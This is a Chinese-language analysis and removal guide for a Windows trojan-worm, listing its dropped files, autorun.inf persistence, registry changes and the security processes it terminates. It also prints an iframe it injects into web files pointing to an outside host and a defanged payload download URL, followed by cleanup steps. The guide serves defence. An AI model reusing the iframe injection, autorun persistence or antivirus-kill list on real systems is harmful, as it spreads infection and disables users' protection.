病毒名：Trojan-psw.Win32.Magania.os 卡巴
　　Worm.Win32.Delf.ysa 瑞星 
　　文件變化: 
　　釋放文件
　　C:\WINDOWS\system32\Shell.exe
　　C:\WINDOWS\system32\Shell.pci
　　C:\pass.dic

　　各分區(qū)根目錄釋放
　　shell.exe
　　autorun.inf

　　autorun.inf內(nèi)容
　　[Autorun]
　　OPEN=Shell.exe
　　shellexecute=Shell.exe
　　shell\Auto\command=Shell.exe

　　修改注冊(cè)表:
　　創(chuàng)建啟動(dòng)項(xiàng)目
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        <Shell.exe><C:\WINDOWS\system32\Shell.exe>
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
為0 
　　破壞顯示隱藏文件
　　其他行為

　　停止server服務(wù)
　　查找SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\密碼防盜專家 綜合版 注冊(cè)表項(xiàng)
　　找到則將其刪除

　　終止以下進(jìn)程或關(guān)閉窗口
KVXP.KXP
KVMonXP.KXP
RavMon.exe
RavMonClass
TfLockDownMain
ZoneAlarm
ZAFrameWnd
VirusScan
Symantec AntiVirus
Duba
Wrapped gift Killer
IceSword
pjf(ustc)

EGHOST.EXE
PasswordGuard.exe
MAILMON.EXE
KAVPFW.EXE
IPARMOR.EXE
_AVP32.EXE..
_AVPCC.EXE
_AVPM.EXEAVP32.EXE
AVPCC.EXE
AVPM.EXE
AVP.EXE
NAVAPW32.EXE
NAVW32.EXE
nod32kui.exe
nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
vsmon.exe
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
360Safe.exe
360tray.kxp
FrogAgent.exe
FYFireWall.exe
Rundl132.exe
Logo_1.exe
Logo1_.exe

　　遍歷非系統(tǒng)分區(qū)的.ASP .exe .com .pif .exe .ASPX .COM .HTM .HTML .JSP .PHP文件
感染.ASP
.ASPX
.COM
.HTM
.HTML
.JSP
.PHP
文件
在其后面加入 <iframe src=http://www.photoyahoo5.com                                           width=0 height=0></iframe>的代碼

　　感染.exe .com .pif .exe
　　在其頭部加入64516字節(jié)的內(nèi)容 屬于文件頭寄生感染

　　連接網(wǎng)絡(luò)下載hXXp://www.photoyahoo5.com/tools/01.exe到C盤根目錄下

　　清除方法:
　　1.安全模式下：(重啟系統(tǒng)長(zhǎng)按F8直到出現(xiàn)提示，然后選擇進(jìn)入安全模式)

　　把下面的 代碼拷入記事本中然后另存為1.reg文件
 Windows Registry Editor Version 5.00 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"



　　雙擊1.reg把這個(gè)注冊(cè)表項(xiàng)導(dǎo)入

　　雙擊我的電腦，工具，文件夾選項(xiàng)，查看，單擊選取"顯示隱藏文件或文件夾" 并清除"隱藏受保護(hù)的操作系統(tǒng)文件（推薦）"前面的鉤。在提示確定更改時(shí)，單擊“是” 然后確定

　　然后刪除
 C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic 


　　以及各個(gè)分區(qū)下面的shell.exe
　　autorun.inf

　　2.刪除病毒啟動(dòng)項(xiàng)(開始菜單－運(yùn)行－輸入“msconfig”－啟動(dòng)－刪除帶Shell的項(xiàng))
　　[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>

　　3.利用反病毒軟件修復(fù)受感染的exe文件
　　4.修復(fù)被修改的網(wǎng)頁(yè)文件